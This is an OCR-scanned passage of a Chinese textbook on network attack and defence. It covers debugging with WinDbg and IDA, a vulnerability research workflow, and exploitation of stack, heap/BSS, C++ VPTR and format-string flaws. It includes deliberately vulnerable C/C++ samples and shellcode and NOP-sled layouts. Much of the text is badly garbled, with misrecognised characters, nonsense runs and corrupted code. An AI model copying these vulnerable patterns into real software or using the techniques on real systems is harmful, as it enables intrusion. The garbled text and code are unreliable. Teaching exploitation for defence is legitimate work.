HO19FFE4 
77 7E6/BG 


kernel32 


Pointer t 


-Base 


o ne 


SE handler 


ESI 


inDbg:6.11.0001.404 X86 [Ss — 


üx80554fcü 


[Break instruction exception — code 80000003 (first chance) 
(EEE QECOXECOE AE UOCE ER DEERE OE CE IE OEC SERRE EEE EN BEERS JE OO MO EPR EEE DOE (XC E e Ge DOE XX AC OX AE REE ER RERNEREREREP OEC E 


You are seeing this nessage because 
CTRL4C (if vou run kd.exe) or, 
CTRL-BEEAE (if you run WinDBG). 


kev now. 
"g" and "Enter" 


press the "Enter" 


does, press Again. 


* * OR OX wow RE * ox 


on your debugger machine's keyboard. 


you pressed either 


If you did not intend to break into the debugger, 


THIS IS HOT A BUG OR A SYSTEM CRASH 


press the 


This message might immediately 


= ig key , 
reappesar. 


then 


If it 


X X X* X* X 0X KK k x X* * 


3€E3EJCOE 3E 0E 3€ 3E IE 3E 3E IEEE 3L E 3E 3L EE ILLE 3E XE3ENE3XEXC4E 30 ECL 3EOE3E LIE E IEEE E EE XE 30330 E IEOXEOE OEC 3EEOE 3E EXE LXX 3L EX OÀXXOÀEOÀX 


|*= ERROR: Symbol file could not be found. 


Int!DbgBreakFPointWithStatus-cÜüx4: 
[80528bdc cc int 3 
kd» q 


4 | I" 


| 


Defaulted to export symbols for ntkrnl 


= 
-— 


|xBUSY* [Debusgee is running... 
E 3-3 利用 WinDbg 进行 动态 分 析 





EBF 
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2. 静态 调试 


静态 调试 分 析 方 法 是 指使 用 IDAPro 等 逆 问 工具 来 进行 反 汇 编 , 获 得 程序 的 "整体 观 ” 
pigania aake 了 了 解 代 码 所 实现 的 功能 , 找 出 代码 
中 可 能 存在 的 缺陷 。 目 前 该 方法 主要 用 于 辅助 动态 调试 。 只 有 将 动态 调 斌 和议 态 分 析 结 合 
起 来 才能 快速 地 定位 漏洞 函数 ,提高 分 析 的 效率 。 

目前 只 通过 使 用 静态 分 析 来 定位 漏洞 的 情况 并 不 多 ,这 是 因为 长 户 的 反 汇 编 代 码 只 徘 
人 工分 辩 是 非常 困难 的 ,理解 起 来 也 非 稼 的 困难 , 稼 稼 一 个 功能 简单 的 程序 反 汇 编 以 后 代码 
量 会 很 大 。 但 有 些 洗 洞 ,通过 反 汇 编 代 码 能 够 很 快 地 发 现 , 如 前 不 久 国内 某 银 行 的 网 上 银行 
中 存在 的 一 个 缓冲 区 海 出 漏洞 ,通过 反 汇 编 代码 分 析出 原因 为 : Eee RREA PR ZT. 
ecx 寄存 天 里 保存 的 是 有 效 基 地 址 ,而 且 后 续 的 代码 将 会 用 到 该 ecx FF Fae PAY FT 
层 函 数 在 调用 一 个 于 函数 时 使 用 到 了 ecx SEE ,而 且 使 用 前 并 没有 保存 原始 值 , 在 返回 上 
Ei BRANI ecx 的 值 已 经 被 修改 了 ; AUR E ES ER CBE fS HH. ecx 作为 基地 址 时 ,出 现 了 异 篆 。 
图 3-4 为 利用 IDA 进行 静态 分 析 的 界面 。 


"v IDA - CAUsersVAdministratorNDesktop VS Mibwechatdog.so 
File Edit Jump Search View Debugger Options Windows Help 
| 3 7h B&F sali JE ERE RM Eon > O OBESSE 


Library function D Data Bl Reguler function BB Unexplored Bl Instruction External zymbol 


IDA View E 回 Hex View-l [A] Structures E] Enuns [X | si Imports [ge] Exports (3 

.text:BB8B8Bn888 
.text:B88886888 ; detail: :RunnableFunctor<detail::binder1 mévoid, ActiveLogic>>::“RunnableFuncto 
-text > G606A888 WEAK — 7ZHódetaili5RunnableFunctorIHS 9binderi milviiActiveLogicEEE 
- text: BBBBABRS  2H6detaill5RunnableFunctorIHS 9binderi milvitActiveLogicEEED@Ey 
.Lext:üBlBBnBSSS ; DATA XREF: .data.rel.ro:üBWH2F3FCLO 
.text:BHBBBAaSSS 10 B5 4{R4,LR} 
-text: 8606A88A 65 4B » =(off 2FC78 一 BxA892) 

~ |.text:üBBBABSC Bh 1C , Rg 
.text:BüBBRBBSE 7B ^^ , PC ; off ?FC7B 
.text:üü8004890 1B 68 1 ; unk 2F3DB8 

 |.text:BH8B8HB8589? 88 33 

” |-text :HBHBAn89A H3 6H . 
text :HA FF F? 38 EC ed ; operator delete(uoid =) 

` j.text:üüHBAaB9Aa 2H 10 
-text: G006A89C 180 BD 
.text:üBBBRnB9C 
- text: 8600A89C 
. text = 6666A89C ; 
-text: G606A89E CO 46 ALIGN x18 
-text: 660000800 ES 53 82 ÖÖ of F_ABAD DCD of F_2FC79 = GxAS92  ; DATA XREF: detail: :RunnableFunctor<det 
text = G000A8A4 
- text: 8600A8~A4 : $UBROUTIAE 



































0000AB88| 0000ABB88: detail: -RonnableFunctor<detail::binderl m¢void, ActiveLogic>>::-RunnableFunct (Synchronized with Hex Vie 
£ 


| fm) Output window 口 


The initial autoanalysis has been finished. 





3-4 利用 IDA 进行 静态 分 析 


3. 指令 追踪 

在 进行 省 油分 析 的 时 候 , 可 能 会 碰 到 绪 合 动态 调试 和 静态 调试 分 析 者 很 难 在 短 时 间 扩 
进行 定位 的 情况 ,此 时 就 可 以 运用 指令 追踪 技术 。 一 方面 ,可 以 先 运 行 一 个 正 第 的 程序 , 动 
态 进 行 调试 ,以 此 来 跟 踩 正 第 的 程序 走 癌 ,获取 所 有 执行 过 的 指令 序列 集合 ; 为 一 方面 , 触 
发 漏洞 ,获取 在 攻击 状态 下 程序 执行 的 指令 序列 集合 。 最 后 对 两 种 执行 过 的 指令 进行 比较 ， 
重点 逆 问 分 析 在 两 次 执行 过 程 中 表现 不 同 的 代码 段 , 并 且 动 态 地 进行 调试 ,同时 跟踪 此 部 分 
代 人 码 ,最 终 定 位 到 目标 源 洞 函数 。 

例如 ,笔者 置 遇 到 一 个 Oday 漏洞 ,在 分 析 该 源 洞 时 就 用 到 了 指令 退 踊 拉 术 。 刚 开始 动 
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态 调 试 和 静态 分 析 并 用 ,并 没有 快速 地 定位 到 漏洞 出 现 原 因 。 然 后 答 试 性 地 传人 一 个 正确 
的 参数 ,动态 调试 并 记录 指令 序列 集合 ,之 后 再 传人 一 个 异常 的 参数 ,动态 调试 并 记录 指令 
序列 集合 。 通 过 对 比 这 两 种 指令 序列 ,找到 相 寞 的 部 分 ,再 结合 动态 调试 很 快 就 定位 到 了 漏 
洞 发 生 的 原因 。 

4. 补丁 对 比 

种 丁 对 比 的 前 提 是 厂商 已 经 针对 汤 洞 发 布 了 安全 补丁 。 从 汤 洞 发 现 到 厂商 公布 安全 人 补 
丁 这 段 时 间 ,漏洞 可 能 还 没有 公开 ,互联 网 上 有 关 漏 洞 的 细节 信息 很 少 。 而 安全 补丁 一 旦 公 
布 ,其 中 的 漏洞 信息 也 就 相当 于 随 之 一 同 公布 了 ,可 以 通过 比较 分 析 打 补丁 前 后 PE 文件 的 
及 汇编 代码 得 到 存在 漏洞 的 函数 ,然后 编号 POC 代码 。 


3.3 漏洞 利用 


3.3.1 漏洞 研究 流程 


进行 源 洞 研究 , 宕 要 按照 科学 的 研究 流程 。 本 市 将 总 结 出 一 套 具 体 的 漏洞 分 析 流 程 。 
个 湄 洞 研究 流程 可 分 为 漏洞 重 现 、 沁 洞 分 析 、 源 洞 利 用 和 疡 洞 总 结 4 个 环 市 ,如 图 3-5 所 示 。 






漏洞 重 现 










er 背景 原 s SB 
洞 洞 分 析 hia 





Ei 





| 编写 辅助 
工具 

编写 POC 
代码 


3-5 ”漏洞 研究 流程 图 


1. 漏洞 重 现 环 节 

漏洞 重 现 环节 需要 搭建 必要 的 测试 环境 ,通常 为 虚拟 机 环境 ; 另外 需要 重视 的 是 有 漏 
洞 的 内 核 文件 或 驱动 程序 的 版 本 ,如 果 版 本 不 对 是 不 可 能 重 现 的 ; 还 要 确认 该 漏洞 是 否 已 
经 打 补 本 ,如果 已 经 打 补 丁 , 需 要 恢复 到 之 前 的 系统 版 本 ; 最 后 ,如 果 该 漏洞 已 经 公开 了 
POC 源码 ,还 需要 对 POC 源码 进行 编 谋 。 巾 此 可 知 , 从 漏洞 的 重 现 到 漏洞 的 分 析 是 一 个 巾 
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表 及 里 .联系 紧密 的 过 程 。 

事实 上 , 油 洞 重 现 的 过 程 往 往 与 漏洞 分 析 是 同步 进行 的 ,是 不 可 分 割 . 相 辅 相 成 的 ,而 在 
漏洞 重 现 环 节 只 需 搭建 好 必要 的 环境 。 

2. 漏洞 分 析 环 节 

涯 洞 分 析 环 市 是 整个 效 洞 人 妍 究 过 程 中 最 为 核心 的 环 方 ,如 果 不 能 分 析 清 苞 汤 洞 的 前 因 


后 果 , 那 么 涯 洞 的 利用 也 就 无 从 下 手 。 疡 洞 分 析 其 实 是 一 个 倒 根 问 的 的 过 程 。 


在 具体 的 分 析 之 前 ,通常 需要 人 研究 漏洞 相关 的 背景 知识 ,如 果 在 不 清楚 背景 知识 的 情况 
下 ,直接 进行 分 析 ,难度 会 增 大 很 多 。 只 有 在 熟悉 了 相关 至 景 理论 的 情况 下 ,才能 将 涯 洞 触 
发 的 整个 过 程 有 一 个 消 晰 的 认识 ,因此 ,搜集 着 洞 相 关 苔 景 理论 知识 在 源 洞 分 析 过 程 中 是 一 


个 举足轻重 的 步骤。 


对 于 具体 的 漏洞 分 析 , 分 析 的 方法 有 很 多 种 。 如 果 有 源码 ,可 以 先 对 源码 进行 月 盒 分 
prs 如 果 没 有 源码 可 以 对 内 核 或 驱动 PE 文件 进行 反 汇 编 逆 回 分 析 ; WR el AIF A POC 
源码 ,可 以 对 POC 进行 源码 分 析 ( 通 过 阅读 POC 源码 及 注释 ,可 以 很 快 对 该 漏洞 有 一 个 准确 
而 清晰 的 认识 ); 如 果 该 漏洞 相对 应 的 补丁 已 经 发 布 ,还 可 以 在 打 完 补丁 后 ,提取 新 系统 版 本 
的 内 核 和 驱动 文件 ,通过 两 者 进行 对 比分 析 ; 另外 ,还 可 以 通过 给 有 漏洞 的 系统 内 核 或 驱动 
文件 下 断 点 进行 动态 调试 分 析 ; 如 果 能 够 触发 有 汤 洞 的 系统 内 核 或 驱动 程 订 进入 蓝屏 ,还 
可 以 针对 蓝屏 后 的 Memory Dump (完整 转 储 、 内 核 转 储 、 小 型 内 存 转 储 ) 文 件 进 行 蓝屏 分 
析 。 在 整个 过 程 中 ,漏洞 分 析 方 法 大 致 包括 静态 分 析 ,动态 分 析 TRIB BR FD TOT ESS 

漏洞 分 析 是 指 在 代码 中 迅速 地 定位 漏洞 ,了 解 攻击 的 原理 ,准确 地 预 估 洲 在 的 .可 能 的 
漏洞 利用 方式 和 风险 等 级 的 过 程 。 

一 般 可 以 通过 一 些 漏洞 公布 的 网 站 来 获取 相关 漏洞 信息 ,这 样 的 站 点 其 实 有 很 多 ， 
Exploit-db, NT Internals 等 。 公 布 的 漏洞 信息 ,主要 包括 漏洞 厂商 、. 影 响 版 本 .漏洞 描述 、 漏 
洞 发 现时 间 .漏洞 公布 时 间 ,漏洞 状态 和 漏洞 POC, 但 有 时 可 能 并 不 全 面 ,甚至 不 公布 漏洞 
的 POC, 不 过 会 有 人 简单 的 汤 洞 描述 , 留 下 一 些 线索 。 

3. 漏洞 利用 环节 

漏洞 利用 环节 是 建立 在 漏洞 分 析 的 基础 之 上 的 ,编写 能 够 利用 到 该 漏洞 并 且 实 现 特定 
目标 的 代码 ,并 进行 测试 的 一 个 过 程 。 

内 核 涯 洞 的 主要 作用 是 远程 代码 的 任意 执行 、 本 地 权限 提升 、 远 程 拒绝 服务 攻击 和 本 地 
拒绝 服务 攻击 。 从 汤 洞 利用 的 角度 来 看 ,远程 拒绝 服务 和 本 地 拒绝 服务 类 型 的 漏洞 利用 起 
He EG Be fay BE ,并 不 需要 考虑 过 多 的 构造 (构造 漏洞 成 功 触 发 的 条 件 和 数据 )。 人 恰恰 相反 ,远程 
代码 的 任意 执行 和 本 地 权限 提升 的 漏洞 ,利用 起 来 相对 复杂 ,往往 需要 精心 的 构造 ,包括 刊 

针对 不 同 的 漏洞 ,根据 实际 情况 需要 具体 问题 具体 分 析 , 因 为 漏洞 利用 的 细节 各 有 不 
同 。 在 此 过 程 中 ,首先 需要 确定 漏洞 利用 的 方法 ,这 也 是 建立 在 漏洞 分 析 的 基础 上 ,通过 此 
方法 能 够 构造 漏洞 触发 的 环境 。 最 后 , 震 要 编写 POC 代码 来 完成 漏洞 的 利用 。 

4. 漏洞 总 结 环节 

dns ihi] AG PR FE FE EUM Y ei] E ER .漏洞 分 析 、 漏 洞 利用 过 程 之 后 ,再 来 审视 造成 这 个 
漏洞 的 根本 原因 ,并 提出 修补 方法 的 过 程 。 如 果 把 上 面 的 过 程 作为 攻击 ,那么 漏洞 总 结 应 该 
站 立 在 攻击 与 防御 的 对 立 面 上 ,才能 有 所 感悟 与 体会 ,才能 寻求 到 突破 。 通 过 漏洞 总 结 , 能 
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够 将 研究 过 程 中 获取 的 知识 升华 成 一 种 经 验 和 能 力 。 
3.3.2 漏洞 利用 扩 术 


1. 栈 溢 出 漏洞 利用 

为 完成 一 次 缓冲 区 溢出 攻击 ,攻击 者 需要 完成 以 下 3 个 步骤 。 

(1) 注 人 攻击 代码 或 找到 已 有 的 适合 攻击 的 代码 。 

(2) 改变 特权 程序 的 执行 流程 ,使 得 攻击 代码 可 以 以 足够 的 权限 运行 。 

(3) 执行 攻击 代码 ,一般 称 此 攻击 代码 为 Shellcode。 

以 上 3 个 步骤 环 环 相 扣 , 缺 一 不 可 。 

要 实现 第 (1) 步 ,最 常见 的 还 是 注入 攻击 代码 ,因此 构造 有 效 的 攻击 字符 串 是 关键 所 在 。 
一 般 有 3 种 方法 构建 溢出 攻击 字符 串 ,分 别 如 图 3-6 一 图 3-8 所 示 。 


低地 址 ra HE 


缓冲 区 保存 的 EBP 返回 地 址 图 数 参数 | ET 


NOP*-Shellcode Ret 
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低地 址 高 地 址 


缓冲 区 保存 的 EBP | 返回 地 址 图 数 参数 | ETRS 


Ret Ret Ret--- NOP--- 
NOP:-:Shellcode 





低地 址 高 地 址 





3-8 攻击 字符 串 3 


第 一 种 溢出 攻击 字符 串 适 用 于 组 冲 区 大 于 Shelleode 长 度 的 情况 ; 第 二 种 洲 出 攻击 罕 
竺 串 一 般 用 于 缓冲 区 小 于 Shellcode 长 度 的 情况 ; 第 三 种 方法 是 将 Shellcode 放 在 环境 变量 
里 ,是 目前 较为 第 用 的 一 种 方法 。 

在 第 一 种 和 第 二 种 类 型 的 溢出 攻击 字符 串 中 ,Shellcode AY AKAN SA FA NOP 指令 ,这 
是 因为 在 这 两 种 情况 下 Shellcode 的 地 址 无 法 确定 ,但 只 要 返回 地 址 指 癌 Shellcode 前 的 任 

-条 NOP 指令 ,Shellcode 就 可 以 执行 ,这 种 方法 大 大 增加 了 Shellcode 执行 的 可 能 性 。 这 
些 NOP 指令 称 为 sledge。 其 他 单字 市 指令 (如 AAA 等 ) 也 可 构成 sledge, 
男 外 ,利用 已 经 存在 的 代码 更 是 一 种 省 力 的 方法 。 当 攻击 者 所 要 的 代码 已 经 存在 于 被 
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而 络 攻 防 原 理 及 应 用 


攻击 的 程序 中 时 ,攻击 者 所 要 做 的 只 是 对 代码 传递 一 些 参数 ,然后 使 程序 跳 转 到 想 要 执行 的 
代码 位 置 。 例 如 ,在 Linux 环境 中 攻击 代码 要 求 执行 “exec(“bin/sh’”)”, 而 在 libe 库 中 的 代 
人 码 执 行 execCarg) ,其 中 arg 是 一 个 指 问 字符 串 的 指针 参数 ,那么 攻击 者 只 要 把 传人 的 参数 
指针 修改 指 问 /bin/sh, 然 后 跳 转 到 libe 库 中 相应 的 指令 序列 即 可 。 

第 二 个 步骤 是 发 动 一 次 缓冲 区 汶 出 攻击 的 最 大 难点 和 关键 所 在 。 在 3.2 中 对 此 步 又 有 
TÉ 2H I SUVS , 

最 后 要 执行 的 Shellcode 来 完成 特定 功能 ,实现 攻击 者 的 目的 。Shellcode HR 48 7) fa 
洁 , 可 重用 性 强 。 

综 上 所 述 ,堆栈 次 出 攻击 利用 了 操作 系统 、 高 级 语言 和 应 用 程序 的 很 多 缺陷 , 现 归 纳 利 
用 堆栈 溢出 漏洞 的 必要 条 件 如 下 。 

CD C 语言 不 做 数组 边界 检查 ,因此 可 以 洲 出 缓冲 区 。 

(2) 可 以 通过 堆栈 中 洪 出 的 缓冲 区 改写 函数 的 返回 地 址 (特殊 指针 ) ,改变 程序 的 执行 
流程 。 

(3) 堆栈 可 执行 ,以 便 执 行 哩 然 短 小 却 功 能 强大 的 Shellcode。 

(4) 程序 员 编 写 的 应 用 程序 有 洗 润 ,使 攻击 得 以 成 功 。 

(5) 操作 系统 没有 进行 正确 的 设置 ,如 未 关闭 不 需要 的 特权 程序 等 ,从 而 给 攻击 者 以 可 
乘 之 机 。 

2. 堆 /BSS 段 浇 出 漏洞 利用 

EHA BSS 段 区 中 可 能 含有 大 量 可 被 汶 出 的 敏感 数据 ,如 文件 名 、 密 码 、 环 境 变量 、 图 
数 指针 、setjmp/1longjmp 图 数 用 到 的 保存 程序 执行 时 栈 帆 情况 的 buf, FILE 结构 等 。 

1) 覆盖 文件 .函数 指针 

攻击 者 可 以 利用 缓冲 区 海 出 来 履 凑 指针 ,从 而 改写 文件 名 、 密 码 . 用 户 uid 等 。 这 种 类 
型 的 攻击 需要 一 些 前 提 条 件 : 在 弱点 程序 的 源码 中 ,必须 首先 声明 或 定义 一 个 缓冲 区 
buffer ,然后 是 一 个 指针 。 类 似 的 关键 代码 如 下 。 





static char buf[BUFFSIZE]; 
static char * ptr; 


缓冲 区 buf 和 指针 ptr 可 以 同时 在 BSS 段 区 ,或 者 同时 在 堆 中 ,或 者 同时 在 数据 段 中 ， 
或 者 buf 在 BSS 段 区 而 ptr 在 数据 段 。 由 于 堆 是 同上 生长 的 ,因此 指针 必须 位 于 buf 的 后 
面 才 能 保证 通过 buf 的 洲 出 来 改写 指针 。 例 如 ,一 个 昼 点 程序 ,其 ptr 指 问 一 个 临时 文件 名 
tmpfile, 利 用 gets(buf) 获 得 用 户 输 入 数据 InputString 并 号 入 ptr 所 指 回 的 文件 中 。 巾 于 
gets() 图 数 不 做 边界 检查 , 便 可 以 汶 出 buf 和 改写 ptr 履 盖 文件 名 从 而 打开 另 一 个 文件 。 假 
设 该 程序 是 以 管理 员 的 身份 在 运行 , 那 就 能 打开 管理 员 所 拥有 的 文件 并 与 人 数据 ,进行 更 改 
设置 等 操作 。 

在 攻击 程序 中 ,可 以 将 溢出 字符 串 设置 成 “InputString|argv 的 地 址 ”, 其 中 InputString 
为 要 与 人 文件 的 数据 KE ATAU AY buf 与 ptr 之 间 的 距离 (tmpfile addr)-(buf addr) ,argv| 1 | 
地 址 为 弱点 程序 的 argvLlj 地 址 ,可 以 通过 不 断 推 测 得 到 T EOS DE HI SC TE TE 29 58 ka EE FF. HJ 
argvL 1 |f A ET DORE TE Ha FR E XE I8] 25 58 5 FE HJ. buf ,使 得 ptr 指 回 我 们 关注 的 文件 ,从 
而 达到 攻击 目的 。 
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履 病 图 数 指针 与 前 面 所 述 改写 文件 指针 的 思想 基本 相同 ,弱点 程序 中 出 现 了 缓冲 区 和 本 
数 指针 的 相继 定义 后 ,通过 洲 出 缓冲 区 改写 图 数 指针 使 其 指 回 所 需要 的 图 数 或 Shellcode。 
如 果 弱 点 程序 是 以 管理 员 吴 份 在 运行 , 便 可 以 利用 这 次 汶 出 攻击 获得 更 高 的 权限 。 

下 面 的 代码 就 是 具有 这 样 漏洞 的 程序 。 程 序 段 中 虽然 来 用 了 strncpy() 代 符 了 了 strcpy()， 
但 由 于 限定 长 度 为 源 串 的 长 度 ,并 不 能 起 到 边界 检查 的 作用 ,依然 会 导致 缓冲 区 洲 出 。 

其 中 ,argvLlj 为 复制 到 buf WFP HR. argv 2 | YEA ew ada tt funcptr 所 指 问 函数 的 
参数 。goodfunc() 为 洲 出 前 图 数 指 针 funcptr 所 指 回 的 图 数 。 可 以 通过 汶 出 buf 修改 图 数 
指针 funcptr 指 回 需要 的 图 数 或 Shellcode。 


int goodfunc(const char * str); 

int main(int argc, char * argv) { 

static char buf[ BUFSIZE]; 

static int( * funcptr) (const char * str); 
funcptr = (int( * )(const char * str) goodfunc; 
memset(buf,0,sizeof( buf) ); 
strncpy(buf,argv[1], strlen(arqv[1])); 
(void)( * funcptr)(argv[2]); 

return 0; 

} //end of main 

int goodfunc(const char * str) { 
printf("Goodfunction, Passed: % s\n", str); 
return 0; 

} / / end goodfunc 


2) fium C++ He eR AR ET VPTR 

在 C++ 中 涉及 多 态 性 的 时 候 , 需 要 用 到 沛 后 联 编 (Late Binding) ,或 者 称 为 动态 联 编 
(Dynamic Binding)。 图 数 实 现 与 图 数 调用 并 不 是 在 编 详 阶 段 就 确定 关联 ,而 是 一 直到 执行 
时 才 进 行 这 种 关联 。 

当 把 类 的 成 员 函 数 声 明 为 虚 函 数 (Virtual Function) 时 ,动态 联 编 便 会 发 生 。 关 键 字 
virtual 指示 编译 大 不 进行 静态 联 编 ,而 是 目 动 安装 动态 联 编 所 需要 的 机 制 。 

编译 器 便 会 为 含有 虚 函 数 的 每 个 类 创建 一 张 虚 函 数 表 (VTable) ,在 这 些 虚 函数 表 中 ， 
依次 按照 函数 声明 次 序 放 置 类 的 特定 虚 函 数 的 地 址 ,同时 在 每 个 带 有 虚 函 数 的 类 中 放置 一 
个 称 为 Virtual Pointer 的 指针 ,简称 VPTR。 这 个 指针 指向 各 自 的 VTable。 

关于 虚拟 函数 表 与 VPTR ,有 以 下 几 点 需要 说 明 。 

(1) 每 一 个 类 别 只 能 有 一 个 虚 函 数 表 ,如 果 该 类 没有 虚 图 数 , 则 不 存在 虚 函 数 表 。 

(2) C++ Jg VETST Ap PE ais zz TE Fr A ME PBI SP E — 71 8 I8] ie PRICE HJ TET VPTR。 

(3) 从 一 个 类 别 诞 生 的 每 一 个 对 象 ,将 获取 该 类 别 中 的 VPTR 指针 ,这 个 指针 同样 指 
向 类 的 VTable。 

当 通 过 基 类 指针 调用 虚 函 数 的 时 候 , 编 详 希 将 为 编程 人 员 取 得 VPTR 并 在 确切 的 该 类 
的 VTable 中 取得 虚 困 数 地 址 ,实现 动态 联 编 。 不 同 的 编 详 希 ,VPTR 放置 的 位 置 不 尽 相 
同 。 当 VPTR 是 放置 在 成 员 变 量 之 后 时 ,如 有 果 成 员 变 量 中 含有 缓冲 区 ,就 可 通过 游 出 该 组 
冲 区 (利用 strcpy 或 其 他 不 安全 函数 ) 改 写 VPTR, 使 其 指向 伪造 的 VTable。 通 常 可 以 在 
iui h HJ P DC P Dass Pris HR V Table. 

在 下 述 程序 段 中 ,类 A 含有 名 为 bufL6j 的 缓冲 区 ,利用 strepy() 为 缓冲 区 赋值 ,如 果 运 
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行 时 设置 命令 行 参 数 为 "I am a hacker”. MA te f 38 [8] HE FR 2C printBuffer ORJ VPTR ,导致 


# include < iostream > 

class A( 

private: 

char buf[6]; 

public: 

void setBuffer(char * tmp) {strcpy(buf, tmp) } 
virtual void printBufferl() {cout << str << endl; 


}; //end class A 

void main(int arc, char ** argv) { 
A *a; 

A=new A; 

a-» setBuffer(arqv[1]); 

a-—> printBuffer(); 

} / / end of main 


为 了 达到 攻击 目的 ,可 以 这 样 浇 出 缓冲 区 buf: Æ buf KRIA Shellcode 的 地 址 ( 设 为 
A),Shellcode HX 7 m VPTR 的 值 ( 该 值 为 被 洲 出 缓冲 区 buf 的 地 址 )。 当 程序 调用 虚 困 
数 printBuffer() FF .Shellcode 便 得 以 执行 。 

当 VPTR 放置 在 对 象 空间 的 起 始 处 时 ,其 后 面 的 才 是 对 象 的 数据 成 员 变 量 , 由 于 堆 的 
向 上 增长 ,无 论 绥 冲 区 代码 中 的 str zii Hi EE BE Y fu] ,都 无 法 覆盖 和 改写 VPTR. 

因此 向 导 利 用 对 象 之 外 的 缓冲 区 溢出 覆盖 VPTR ,该 缓冲 区 可 能 是 在 对 象 前 动态 分 配 
的 一 个 缓冲 区 ,也 可 能 是 两 个 相 邻 对 象 中 前 一 个 对 象 的 缓冲 区 。 

对 于 前 一 种 情况 , 即 利 用 对 象 前 动态 分 配 的 一 个 缓冲 区 。 假 设 类 CA — A he PRIA VEO, 
ptr 为 该 对 象 的 指针 ,buff 为 动态 分 配 的 缓冲 区 ,ptr RHF buff 分 配 ,其 程序 如 下 所 示 。 


char * buff = new char[100]; 

C * ptr = new C; 

memcpy( buff, arg, len); / x 缓冲 区 洲 出 */ 
Ptr —> vf(); / [T8] FA E ER C 


在 这 种 情况 下 ,攻击 者 就 可 以 溢出 缓冲 区 buff 修改 ptr 所 指向 对 象 的 VPTR ,达到 攻击 
目的 。 

若 为 后 一 种 情况 , 即 利 用 两 个 相 邻 对 象 中 前 一 个 对 象 的 缓冲 区 。 假 设 有 classl 和 
class2 两 个 类 ,classl 中 有 缓冲 区 bufl| 10 |. HE ER Be — classl O fI runl O ,class2 中 有 缓冲 区 
buf2| 10 |」、 虚 图 数 一 class2() 和 run2()。 其 程序 如 下 所 示 。 


void main(int arc, char ** argv) { 
classl * cl- new classl; 

classl * c2 = new class2; 
strcpy(cl -> bufl,argv[1]); 
delete cl; 

delete c2; 

return 0; 

} //end of main 
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两 个 对 象 在 堆 中 被 实例 化 ,分 别 由 对 象 指 针 cl、c2 表示 ,这 两 个 对 象 内 存 空 间 是 相 邻 
的 ,攻击 者 可 以 溢出 cl 一 > bufl, 使 其 侵 和 人 邻近 的 对 象 空间 中 ,从 而 覆盖 第 二 个 对 象 ( 由 指针 
c2 表示 ) 的 VPTR。 与 前 面 类 似 , 在 bufl 中 构造 自己 的 Vtable, 使 得 改写 的 VPTR H I8] £4 
WHJ VWtable。 另 外 ,还 可 以 伪造 构造 图 数 一 class2(), 从 而 当 c2 被 释放 时 ,Shellcode 得 以 
执行 。 

在 堆栈 中 利用 缓冲 区 洪 出 可 以 覆盖 函数 返回 地 址 或 保存 的 堆栈 指针 。 而 在 堆 /BSS EE 
中 的 缓冲 区 六 出 则 以 困 数 指针 或 文件 名 字符 串 指 针 等 作为 上 黎 兰 目标 。 许 多 BSS 段 类 型 的 
缓冲 区 洲 出 不 需要 Shellcode, 使 得 BSS 洲 出 有 与 平台 无 关 的 特性 。 

堆 /BSS 有 段 中 的 缓冲 区 洪 出 比 堆栈 缓冲 区 洪 出 在 技术 上 更 加 复杂 ,但 是 由 于 堆 /BSS E 
可 以 执行 的 可 能 性 远 远 大 于 堆 栈 执行 的 可 能 性 ,使 得 堆 /BSS 段 溢出 更 加 容易 成 功 。 堆 / 
BSS 段 中 的 缓冲 区 汶 出 技术 的 出 现 , 打 破 了 堆 和 数据 段 中 的 缓冲 区 比 堆栈 段 中 的 缓冲 区 更 
加 安全 的 神话 ,使 得 缓冲 区 溢出 漏洞 威胁 的 范围 大 大 增加 。 

3. 格式 化 字符 串 漏洞 利 用 

格式 化 字符 串 漏 洞 是 一 种 非常 有 意思 的 漏洞 ,从 表面 上 看 , 它 与 以 前 的 缓冲 区 汶 出 并 不 
是 同一 种 类 型 的 漏洞 ,但 是 它们 有 很 多 相似 之 处 。 因 此 在 研究 这 两 种 漏洞 过 程 中 也 用 到 了 
很 多 相同 的 技术 和 方法 。 

在 标准 C 语言 的 库 函 数 中 有 一 大 类 函数 称 为 格式 化 输入 /输出 函数 。 这 一 类 图 数 的 特 
Ree: 参数 的 数目 不 确定 。 格 云 化 串 狂 洞 就 是 由 这 一 类 图 数 引 起 的 ,主要 的 问题 吨 效 如 下 。 


fprintf 输出 到 文件 句柄 

printf 输出 到 终端 

sprintf 输出 到 一 个 字符 串 

snprintf 输出 指定 长 度 到 字符 串 

vfprintf 从 一 个 va arg 结构 输出 到 文件 流 

vprintf 从 一 个 va arg 结构 输出 到 标准 输出 

vsprintf 从 一 个 va arg 结构 输出 到 字符 串 

vsnprintf 从 一 个 va arg 结构 输出 到 字符 串 , 并 且 检 查 长 度 


由 于 编译 这 些 函 数 时 参数 个 数 未 知 , 因 此 只 能 运行 时 以 格式 串 来 指示 。 这 样 的 特性 有 
利于 编程 的 灵活 性 ,有 利于 程序 运行 的 性 能 , 却 不 利于 程序 的 安全 性 。 格 式 化 字符 串 包 含 要 
打印 的 文本 和 格式 参数 的 ASCIIZ( 以 NULL 结尾 的 ASCID 字 符 串 。 例 如 "中 国有 %d\n 名 
大 学 生 。" 就 是 一 个 格式 化 字符 串 。 在 C 语言 

中 ,格式 参数 有 % d. 6 x 9 o 96 u% ce% s, 

Ke Vf Ke. Ven 等 。 格式 化 字符 串 控制 函数 yp 
的 功能 ,说 明 存放 在 堆栈 中 的 函数 参数 如 何 打 E | 六 他 局 于 这 时 


EN ,而 调用 格式 化 郴 数 的 调用 音 必 须 傈 证 格 却 长 "—" 
串 和 其 他 参数 完全 匹配 ,C 语言 本 身 没有 机 制 M ABE 


PETUR Reta ET FP 


一 Ft ara et AP 





去 检查 参数 个 数 和 参数 类 型 是 否 正确 。 以 
prinft K AA fil, 运行 时 堆栈 布局 如 图 3-9 


BN. 
printf iz fq At f FH dE x GB FE TR £F FP 和 其 图 3-9 ”运行 printf O 图 数 时 的 堆栈 布局 


32 


凤 | 络 攻防 原理 及 应 用 


他 参数 栈 指针 AP 来 解释 执行 。printf 认为 第 1 个 参数 是 格式 串 ,然后 进行 以 下 操作 。 

(1) 不 断 移动 FP, 直 到 找到 一 个 格式 参数 。 

(2) 以 该 格式 参数 去 读 取 AP 指示 的 数据 ,并 移动 AP, 

(3) 如 果 格 式 化 字符 串 还 没 结束 , 怠 转 到 (1) 。 

如 果 格 式 串 中 的 格式 参数 少 于 要 打印 的 参数 ,就 出 现 “ 回 下 洲 出 ”;: 如 果 格 式 串 中 的 格 
式 参 数 多 于 要 打印 的 参数 ,就 出 现 “ 辐 上 浇 出 ”。 如 果 攻 击 者 能 够 故意 造成 格式 串 的 洪 出 ,就 
